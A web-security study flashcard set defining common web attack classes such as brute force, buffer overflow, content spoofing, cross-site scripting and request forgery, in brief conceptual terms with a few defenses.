• Shuffle
    Toggle On
    Toggle Off
  • Alphabetize
    Toggle On
    Toggle Off
  • Front First
    Toggle On
    Toggle Off
  • Both Sides
    Toggle On
    Toggle Off
  • Read
    Toggle On
    Toggle Off

Card Range To Study



Play button


Play button




Click to flip

Use LEFT and RIGHT arrow keys to navigate between flashcards;

Use UP and DOWN arrow keys to flip the card;

H to show hint;

A reads text to speech;

18 Cards in this Set

  • Front
  • Back

Abuse of Functionality

Uses a web site's own features and functionality to attack itself or others.

Ex. Abusing Send-Mail Functions, Abusing Password-Recovery Flows, Abusing functionality to make unrestricted proxy requests.

Abusing Send-Mail Functions

Web apps that have send mail must not allow complete control over the message headers and content. Attackers can control the from, to, subject, and body there are no anti-automation controls.


HTTP GET could be used to send an email as the web server.

Abusing Password Recovery Flows

Can be abused if generic information is left on this step: Message the user that a email has been sent to their account.

Unauthorized Proxy Requests

Some services (Ex. Google Translate) can be used to act as an open proxy server.

Brute Force

Method to determine an unknown value by using an automated process to try a large number of possible values.

Brute Force Log-in Credentials

Often used with a dictionary as most users utilized common words. Can also utilized number replacements, personal information, and family member name/birth dates/phone numbers. Reverse attacks guess the username with a set password, to attack a random user.

Brute Force Credit Card Information

If an attacker has the card but is missing the CVV/SCS or Expiration date, they can easily brute force the information.

Buffer Overflow

Flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold. Uses: Control process execution, crash a process, modify internal variables.

Buffer Overflow Defenses

Avoid low level languages such as C and C++. Java, C+ or scripting languages instead. Or avoid dangerous APIs whose use often leads to buffer overflows.

Content Spoofing

Attack technique that allows an attacker to inject a malicious payload that is later misrepresented as legitimate content of a web application.

Text Only Content Spoofing

Dynamically built pages are often passed into the page via a query string value. A title content of a URL can be changed by an attacker, and then appear in the HTML body.

Markup Reflected Content Spoofing

Spoofing a web location to be embedded in a fake URL of a credible website. Used in emails, message boards, or forced on users by Cross-site scripting.

Credential/Session Prediction

Impersonating a web site user using the unique session ID identifying the user session.

Cross-Site Scripting (XSS)

Echo attacker-supplied code into a user's browser instance. Usually written in HTML/JavaScript. Can be written in any browser-supported technology. User could have their account hijacked (cookie theft), browser redirected to another location, shown fraudulent content.

Non-Persistent XSS (DOM-Based)

Requires user to visit specially crafted link laced with malicious code, or visit a malicious web page containing a web form, which when posted to the vulnerable site, will mount the attack.

Persistent XSS

Malicious code is submitted to a web site where it's stored for a period of time. Message boards, web mail messages, and web chat software are common targets.

Cross-Site Request Forgery (CRSF, XSRF)

Piggy-back onto a user to gain the trust of the web server to perform actions, and potentially read responses. Done by reading the format of a legitimate request, and forging a new request. Can be deployed via images, banners, etc...